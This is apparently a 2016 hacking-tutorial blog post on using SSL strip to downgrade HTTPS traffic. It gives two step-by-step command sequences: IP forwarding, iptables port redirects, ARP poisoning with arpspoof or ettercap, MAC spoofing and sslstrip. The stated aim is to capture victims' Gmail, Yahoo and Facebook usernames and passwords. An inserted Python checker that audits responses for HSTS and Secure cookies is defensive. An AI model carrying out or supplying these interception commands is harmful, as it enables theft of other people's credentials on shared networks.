Saturday, 19 March 2016

SSL strip

SSL STRIP: STRIPPING HTTPS TRAFFIC

So far, we have only discussed capturing insecure http traffic, not secure connections like https. For this, a tool called SSL strip comes in handy. This tool is helpful even for websites that switch between https and http. The way it works is that it replaces all the https links with http links and remembers the change. It also strips any secure cookie that it sees in the cookie field of the http request. Secure cookies instruct the browser to transmit them only over https, so by stripping them we are also able to capture cookies. To make the page look legitimate, it also replaces the favicon with a padlock icon so that the victim thinks they are on a secure connection.
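The two behaviours just described (rewriting https links to http and stripping secure cookies) are exactly what the Strict-Transport-Security header and the cookie Secure attribute are meant to defeat. The following checker, an added example that is not from the original post, audits a raw HTTP response for both protections; the two sample responses are constructed.

```python
"""Audit an HTTP response for the protections that counter SSL strip: an HSTS
header (the browser then refuses rewritten http:// links) and the Secure
attribute on cookies (kept off the plain-http connection the proxy forces)."""
import re
from typing import Dict, List

def parse_headers(raw: bytes) -> Dict[str, List[str]]:
    """Map lower-cased header names to their values from a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.decode("latin-1").partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def hsts_max_age(headers: Dict[str, List[str]]):
    """max-age from Strict-Transport-Security, or None if the header is absent."""
    for value in headers.get("strict-transport-security", []):
        m = re.search(r'max-age\s*=\s*"?(\d+)', value, re.I)
        if m:
            return int(m.group(1))
    return None

def audit(raw: bytes, min_age: int = 31536000) -> List[str]:
    """Return one finding per missing protection; an empty list means hardened."""
    headers = parse_headers(raw)
    findings: List[str] = []
    age = hsts_max_age(headers)
    if age is None:
        findings.append("no HSTS: browser will follow rewritten http:// links")
    elif age < min_age:  # one year is the usual minimum
        findings.append(f"HSTS max-age {age} is shorter than {min_age}")
    for cookie in headers.get("set-cookie", []):
        name = cookie.partition("=")[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name!r} lacks Secure: sent over http")
    return findings

# Constructed samples: a weak response and its hardened counterpart.
WEAK = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
        b"Set-Cookie: session=abc123; Path=/; HttpOnly\r\n"
        b"Set-Cookie: csrf=xyz; Path=/; Secure\r\n\r\n<html></html>")
HARDENED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n"
            b"Set-Cookie: session=abc123; Path=/; Secure; HttpOnly\r\n"
            b"Set-Cookie: csrf=xyz; Path=/; Secure\r\n\r\n<html></html>")
if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(resp) or ["ok"])
```

HSTS only takes effect once the browser has seen the header over https (or the site is on the preload list), so the very first plain-http visit is still exposed to the downgrade.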

REQUIREMENTS

In order to run SSL strip, we should already have the ARP spoofing attack in place. You can do it with any of the tools we discussed earlier. Also make sure that IP forwarding is enabled before performing the ARP spoofing attack.

USAGE

SSL strip can be found in the /pentest/web/ssltrip directory. Navigate to that directory and run the following command to start it.
root@bt:/pentest/web/ssltrip#./sslstrip.py -l 8080
The -l parameter instructs SSL strip to listen on port 8080.
Whenever the victim logs in to his account, say, Facebook, his connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can also view the captured traffic in the sslstrip.log file, which is located in the same directory as SSL strip. Just use your favorite text editor to open the log file.

HTTPS HACKING USING SSL STRIP (COMMANDS)

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log

————————————————————————————————————————-
2ND METHOD, BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)

ifconfig wlan0 down
macchanger --mac 00:22:33:44:55:66 wlan0
ifconfig wlan0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
leafpad /etc/etter.conf (remove the # sign in front of the two redir_command_off lines)
ettercap -Tql wlan0 -M arp:remote // // (it shows how many hosts were added to SSL strip)
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -a -k -f (let's look at the victim side)
Open Gmail, Yahoo and Facebook on the victim computer; after logging in, check the attacker PC: the ID and password are shown in the SSL strip terminal.
